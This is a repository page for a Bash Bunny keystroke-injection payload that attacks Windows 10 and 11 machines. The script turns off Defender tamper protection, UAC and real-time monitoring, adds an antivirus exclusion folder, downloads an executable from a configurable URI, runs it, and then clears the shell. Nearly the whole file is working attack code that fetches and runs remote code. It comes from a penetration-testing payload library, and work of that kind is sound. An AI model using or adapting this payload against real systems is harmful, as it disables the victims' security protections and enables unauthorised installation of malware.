hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/remote_access/Windows-Payload-Injector/payload.txt
KryptoKola d237d080e6
payload.txt (#567) 
What the payload does:
#                   1) Disables Tamper Protection in Windows Defender.
#                   2) Disables UAC / Turns UAC off
#                   3) Creates Payload Directory in C:/ Drive
#                   4) Disables Real-Time Protection in Windows Defender.
#                   5) Adds the Payload Directory as an exclusion in Windows Defender
#                   6) Downloads Payload from Specified URI (Enter in Variable Below)
#                   7) Runs Payload on System
2022-12-16 12:59:18 -06:00

86 lines
2.1 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: Microsoft Windows Payload Injector
#
# Description:
# 1) Disables Tamper Protection in Windows Defender.
# 2) Disables UAC / Turns UAC off
# 3) Creates Payload Directory in C:/ Drive
# 4) Disables Real-Time Protection in Windows Defender.
# 5) Adds the Payload Directory as an exclusion in Windows Defender
# 6) Downloads Payload from Specified URI (Enter in Variable Below)
# 7) Runs Payload on System
#
# Author: KryptoKola
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows 10 & 11
LED SETUP
ATTACKMODE HID
#Variables
readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
#Disables Tamper Protection in Windows 10 & 11
LED STAGE1
Q GUI s
Q STRING "Virus & threat protection"
Q ENTER
Q DELAY 10000
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 1000
Q TAB
Q TAB
Q TAB
Q TAB
Q SPACE
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q ALT F4
Q FN ALT F4
#Starts Powershell in Admin mode
LED STAGE2
Q GUI r
Q DELAY 250
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 3000
Q ALT y
Q DELAY 5000
#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
LED STAGE3
Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
Q ENTER
Q DELAY 1500
Q ALT y
Q DELAY 250
#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
LED STAGE4
Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
Q ENTER
Q DELAY 2000
#Launches the Payload on the machine
LED STAGE5
Q STRING ./payload.exe
Q ENTER
Q DELAY 250
#Clears the shell and exits out.
LED CLEANUP
Q STRING clear
Q ENTER
Q DELAY 250
Q STRING exit
Q ENTER
LED FINISH
Reference in New Issue View Git Blame Copy Permalink